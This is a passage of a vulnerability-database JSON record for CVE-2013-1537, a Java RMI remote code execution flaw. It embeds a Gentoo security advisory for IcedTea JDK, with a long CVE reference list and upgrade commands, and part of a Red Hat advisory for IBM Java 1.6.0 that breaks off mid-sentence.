"AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2013-1537", "trust": 1.0, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201304-359", "trust": 0.6, "value": "CRITICAL" }, { "author": "VULMON", "id": "CVE-2013-1537", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-1537" }, { "db": "CNNVD", "id": "CNNVD-201304-359" }, { "db": "NVD", "id": "CVE-2013-1537" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier, 6 Update 43 and earlier, and 5.0 Update 41 and earlier; and OpenJDK 6 and 7; allows remote attackers to affect confidentiality, integrity, and availability via vectors related to RMI. NOTE: the previous information is from the April 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to the default java.rmi.server.useCodebaseOnly setting of false, which allows remote attackers to perform \"dynamic class downloading\" and execute arbitrary code. Oracle Java SE is prone to a remote code execution vulnerability in Java Runtime Environment. \nAn attacker can exploit this issue to execute arbitrary code in the context of the current user. \nThis vulnerability affects the following supported versions:\n7 Update 17 , 6 Update 43 , 5.0 Update 41. In a typical operating environment, these are of low security risk as\nthe runtime is not used on untrusted applets. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201406-32\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n Title: IcedTea JDK: Multiple vulnerabilities\n Date: June 29, 2014\n Bugs: #312297, #330205, #340819, #346799, #352035, #353418,\n #354231, #355127, #370787, #387637, #404095, #421031,\n #429522, #433389, #438750, #442478, #457206, #458410,\n #461714, #466822, #477210, #489570, #508270\n ID: 201406-32\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in the IcedTea JDK, the worst\nof which could lead to arbitrary code execution. \n\nBackground\n==========\n\nIcedTea is a distribution of the Java OpenJDK source code built with\nfree build tools. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-java/icedtea-bin \u003c 6.1.13.3 \u003e= 6.1.13.3 \n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in the IcedTea JDK. \nPlease review the CVE identifiers referenced below for details. \n\nImpact\n======\n\nA remote attacker could possibly execute arbitrary code with the\nprivileges of the process, cause a Denial of Service condition, obtain\nsensitive information, bypass intended security policies, or have other\nunspecified impact. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll IcedTea JDK users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-java/icedtea-bin-6.1.13.3\"\n\nReferences\n==========\n\n[ 1 ] CVE-2009-3555\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3555\n[ 2 ] CVE-2010-2548\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2548\n[ 3 ] CVE-2010-2783\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2783\n[ 4 ] CVE-2010-3541\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3541\n[ 5 ] CVE-2010-3548\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3548\n[ 6 ] CVE-2010-3549\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3549\n[ 7 ] CVE-2010-3551\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3551\n[ 8 ] CVE-2010-3553\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3553\n[ 9 ] CVE-2010-3554\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3554\n[ 10 ] CVE-2010-3557\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3557\n[ 11 ] CVE-2010-3561\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3561\n[ 12 ] CVE-2010-3562\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3562\n[ 13 ] CVE-2010-3564\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3564\n[ 14 ] CVE-2010-3565\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3565\n[ 15 ] CVE-2010-3566\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3566\n[ 16 ] CVE-2010-3567\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3567\n[ 17 ] CVE-2010-3568\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3568\n[ 18 ] CVE-2010-3569\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3569\n[ 19 ] CVE-2010-3573\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3573\n[ 20 ] CVE-2010-3574\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3574\n[ 21 ] CVE-2010-3860\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3860\n[ 22 ] CVE-2010-4351\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4351\n[ 23 ] CVE-2010-4448\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4448\n[ 24 ] CVE-2010-4450\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4450\n[ 25 ] CVE-2010-4465\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4465\n[ 26 ] CVE-2010-4467\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4467\n[ 27 ] CVE-2010-4469\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4469\n[ 28 ] CVE-2010-4470\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4470\n[ 29 ] CVE-2010-4471\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4471\n[ 30 ] CVE-2010-4472\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4472\n[ 31 ] CVE-2010-4476\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4476\n[ 32 ] CVE-2011-0025\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0025\n[ 33 ] CVE-2011-0706\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0706\n[ 34 ] CVE-2011-0815\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0815\n[ 35 ] CVE-2011-0822\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0822\n[ 36 ] CVE-2011-0862\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0862\n[ 37 ] CVE-2011-0864\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0864\n[ 38 ] CVE-2011-0865\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0865\n[ 39 ] CVE-2011-0868\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0868\n[ 40 ] CVE-2011-0869\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0869\n[ 41 ] CVE-2011-0870\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0870\n[ 42 ] CVE-2011-0871\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0871\n[ 43 ] CVE-2011-0872\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0872\n[ 44 ] CVE-2011-3389\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3389\n[ 45 ] CVE-2011-3521\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3521\n[ 46 ] CVE-2011-3544\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3544\n[ 47 ] CVE-2011-3547\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3547\n[ 48 ] CVE-2011-3548\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3548\n[ 49 ] CVE-2011-3551\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3551\n[ 50 ] CVE-2011-3552\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3552\n[ 51 ] CVE-2011-3553\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3553\n[ 52 ] CVE-2011-3554\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3554\n[ 53 ] CVE-2011-3556\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3556\n[ 54 ] CVE-2011-3557\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3557\n[ 55 ] CVE-2011-3558\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3558\n[ 56 ] CVE-2011-3560\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3560\n[ 57 ] CVE-2011-3563\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3563\n[ 58 ] CVE-2011-3571\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3571\n[ 59 ] CVE-2011-5035\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-5035\n[ 60 ] CVE-2012-0497\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0497\n[ 61 ] CVE-2012-0501\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0501\n[ 62 ] CVE-2012-0502\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0502\n[ 63 ] CVE-2012-0503\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0503\n[ 64 ] CVE-2012-0505\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0505\n[ 65 ] CVE-2012-0506\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0506\n[ 66 ] CVE-2012-0547\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0547\n[ 67 ] CVE-2012-1711\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1711\n[ 68 ] CVE-2012-1713\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1713\n[ 69 ] CVE-2012-1716\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1716\n[ 70 ] CVE-2012-1717\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1717\n[ 71 ] CVE-2012-1718\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1718\n[ 72 ] CVE-2012-1719\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1719\n[ 73 ] CVE-2012-1723\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1723\n[ 74 ] CVE-2012-1724\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1724\n[ 75 ] CVE-2012-1725\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1725\n[ 76 ] CVE-2012-1726\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1726\n[ 77 ] CVE-2012-3216\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3216\n[ 78 ] CVE-2012-3422\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3422\n[ 79 ] CVE-2012-3423\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3423\n[ 80 ] CVE-2012-4416\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4416\n[ 81 ] CVE-2012-4540\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4540\n[ 82 ] CVE-2012-5068\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5068\n[ 83 ] CVE-2012-5069\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5069\n[ 84 ] CVE-2012-5070\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5070\n[ 85 ] CVE-2012-5071\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5071\n[ 86 ] CVE-2012-5072\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5072\n[ 87 ] CVE-2012-5073\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5073\n[ 88 ] CVE-2012-5074\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5074\n[ 89 ] CVE-2012-5075\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5075\n[ 90 ] CVE-2012-5076\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5076\n[ 91 ] CVE-2012-5077\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5077\n[ 92 ] CVE-2012-5081\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5081\n[ 93 ] CVE-2012-5084\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5084\n[ 94 ] CVE-2012-5085\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5085\n[ 95 ] CVE-2012-5086\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5086\n[ 96 ] CVE-2012-5087\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5087\n[ 97 ] CVE-2012-5089\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5089\n[ 98 ] CVE-2012-5979\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5979\n[ 99 ] CVE-2013-0169\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0169\n[ 100 ] CVE-2013-0401\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0401\n[ 101 ] CVE-2013-0424\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0424\n[ 102 ] CVE-2013-0425\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0425\n[ 103 ] CVE-2013-0426\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0426\n[ 104 ] CVE-2013-0427\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0427\n[ 105 ] CVE-2013-0428\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0428\n[ 106 ] CVE-2013-0429\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0429\n[ 107 ] CVE-2013-0431\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0431\n[ 108 ] CVE-2013-0432\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0432\n[ 109 ] CVE-2013-0433\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0433\n[ 110 ] CVE-2013-0434\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0434\n[ 111 ] CVE-2013-0435\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0435\n[ 112 ] CVE-2013-0440\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0440\n[ 113 ] CVE-2013-0441\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0441\n[ 114 ] CVE-2013-0442\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0442\n[ 115 ] CVE-2013-0443\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0443\n[ 116 ] CVE-2013-0444\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0444\n[ 117 ] CVE-2013-0450\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0450\n[ 118 ] CVE-2013-0809\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0809\n[ 119 ] CVE-2013-1475\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1475\n[ 120 ] CVE-2013-1476\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1476\n[ 121 ] CVE-2013-1478\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1478\n[ 122 ] CVE-2013-1480\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1480\n[ 123 ] CVE-2013-1484\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1484\n[ 124 ] CVE-2013-1485\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1485\n[ 125 ] CVE-2013-1486\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1486\n[ 126 ] CVE-2013-1488\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1488\n[ 127 ] CVE-2013-1493\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1493\n[ 128 ] CVE-2013-1500\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1500\n[ 129 ] CVE-2013-1518\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1518\n[ 130 ] CVE-2013-1537\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1537\n[ 131 ] CVE-2013-1557\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1557\n[ 132 ] CVE-2013-1569\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1569\n[ 133 ] CVE-2013-1571\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1571\n[ 134 ] CVE-2013-2383\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2383\n[ 135 ] CVE-2013-2384\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2384\n[ 136 ] CVE-2013-2407\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2407\n[ 137 ] CVE-2013-2412\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2412\n[ 138 ] CVE-2013-2415\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2415\n[ 139 ] CVE-2013-2417\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2417\n[ 140 ] CVE-2013-2419\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2419\n[ 141 ] CVE-2013-2420\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2420\n[ 142 ] CVE-2013-2421\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2421\n[ 143 ] CVE-2013-2422\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2422\n[ 144 ] CVE-2013-2423\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2423\n[ 145 ] CVE-2013-2424\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2424\n[ 146 ] CVE-2013-2426\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2426\n[ 147 ] CVE-2013-2429\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2429\n[ 148 ] CVE-2013-2430\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2430\n[ 149 ] CVE-2013-2431\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2431\n[ 150 ] CVE-2013-2436\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2436\n[ 151 ] CVE-2013-2443\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2443\n[ 152 ] CVE-2013-2444\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2444\n[ 153 ] CVE-2013-2445\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2445\n[ 154 ] CVE-2013-2446\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2446\n[ 155 ] CVE-2013-2447\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2447\n[ 156 ] CVE-2013-2448\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2448\n[ 157 ] CVE-2013-2449\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2449\n[ 158 ] CVE-2013-2450\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2450\n[ 159 ] CVE-2013-2451\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2451\n[ 160 ] CVE-2013-2452\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2452\n[ 161 ] CVE-2013-2453\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2453\n[ 162 ] CVE-2013-2454\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2454\n[ 163 ] CVE-2013-2455\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2455\n[ 164 ] CVE-2013-2456\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2456\n[ 165 ] CVE-2013-2457\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2457\n[ 166 ] CVE-2013-2458\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2458\n[ 167 ] CVE-2013-2459\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2459\n[ 168 ] CVE-2013-2460\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2460\n[ 169 ] CVE-2013-2461\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2461\n[ 170 ] CVE-2013-2463\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2463\n[ 171 ] CVE-2013-2465\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2465\n[ 172 ] CVE-2013-2469\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2469\n[ 173 ] CVE-2013-2470\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2470\n[ 174 ] CVE-2013-2471\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2471\n[ 175 ] CVE-2013-2472\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2472\n[ 176 ] CVE-2013-2473\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2473\n[ 177 ] CVE-2013-3829\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3829\n[ 178 ] CVE-2013-4002\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4002\n[ 179 ] CVE-2013-5772\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5772\n[ 180 ] CVE-2013-5774\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5774\n[ 181 ] CVE-2013-5778\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5778\n[ 182 ] CVE-2013-5780\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5780\n[ 183 ] CVE-2013-5782\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5782\n[ 184 ] CVE-2013-5783\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5783\n[ 185 ] CVE-2013-5784\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5784\n[ 186 ] CVE-2013-5790\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5790\n[ 187 ] CVE-2013-5797\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5797\n[ 188 ] CVE-2013-5800\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5800\n[ 189 ] CVE-2013-5802\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5802\n[ 190 ] CVE-2013-5803\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5803\n[ 191 ] CVE-2013-5804\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5804\n[ 192 ] CVE-2013-5805\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5805\n[ 193 ] CVE-2013-5806\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5806\n[ 194 ] CVE-2013-5809\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5809\n[ 195 ] CVE-2013-5814\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5814\n[ 196 ] CVE-2013-5817\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5817\n[ 197 ] CVE-2013-5820\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5820\n[ 198 ] CVE-2013-5823\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5823\n[ 199 ] CVE-2013-5825\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5825\n[ 200 ] CVE-2013-5829\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5829\n[ 201 ] CVE-2013-5830\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5830\n[ 202 ] CVE-2013-5840\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5840\n[ 203 ] CVE-2013-5842\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5842\n[ 204 ] CVE-2013-5849\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5849\n[ 205 ] CVE-2013-5850\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5850\n[ 206 ] CVE-2013-5851\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5851\n[ 207 ] CVE-2013-6629\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6629\n[ 208 ] CVE-2013-6954\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6954\n[ 209 ] CVE-2014-0429\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0429\n[ 210 ] CVE-2014-0446\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0446\n[ 211 ] CVE-2014-0451\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0451\n[ 212 ] CVE-2014-0452\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0452\n[ 213 ] CVE-2014-0453\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0453\n[ 214 ] CVE-2014-0456\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0456\n[ 215 ] CVE-2014-0457\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0457\n[ 216 ] CVE-2014-0458\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0458\n[ 217 ] CVE-2014-0459\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0459\n[ 218 ] CVE-2014-0460\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0460\n[ 219 ] CVE-2014-0461\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0461\n[ 220 ] CVE-2014-1876\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1876\n[ 221 ] CVE-2014-2397\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2397\n[ 222 ] CVE-2014-2398\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2398\n[ 223 ] CVE-2014-2403\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2403\n[ 224 ] CVE-2014-2412\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2412\n[ 225 ] CVE-2014-2414\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2414\n[ 226 ] CVE-2014-2421\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2421\n[ 227 ] CVE-2014-2423\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2423\n[ 228 ] CVE-2014-2427\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2427\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201406-32.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2014 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Critical: java-1.6.0-ibm security update\nAdvisory ID: RHSA-2013:0823-01\nProduct: Red Hat Enterprise Linux Supplementary\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2013-0823.html\nIssue date: 2013-05-14\nCVE Names: CVE-2013-0169 CVE-2013-0401 CVE-2013-1491 \n CVE-2013-1537 CVE-2013-1540 CVE-2013-1557 \n CVE-2013-1563 CVE-2013-1569 CVE-2013-2383 \n CVE-2013-2384 CVE-2013-2394 CVE-2013-2417 \n CVE-2013-2418 CVE-2013-2419 CVE-2013-2420 \n CVE-2013-2422 CVE-2013-2424 CVE-2013-2429 \n CVE-2013-2430 CVE-2013-2432 CVE-2013-2433 \n CVE-2013-2435 CVE-2013-2440 \n=====================================================================\n\n1. Summary:\n\nUpdated java-1.6.0-ibm packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 5 and 6 Supplementary. \n\nThe Red Hat Security Response Team has rated this update as having critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base scores,\nwhich give detailed severity ratings, are available for each vulnerability\nfrom the CVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64\nRed Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node Supplementary (v. 6) - x86_64\nRed Hat Enterprise Linux Server Supplementary (v. 5) - i386, ppc, s390x, x86_64\nRed Hat Enterprise Linux Server Supplementary (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64\n\n3. Detailed\nvulnerability descriptions are linked from the IBM Security alerts page,\nlisted in the References section. (CVE-2013-0169, CVE-2013-0401,\nCVE-2013-1491, CVE-2013-1537, CVE-2013-1540, CVE-2013-1557, 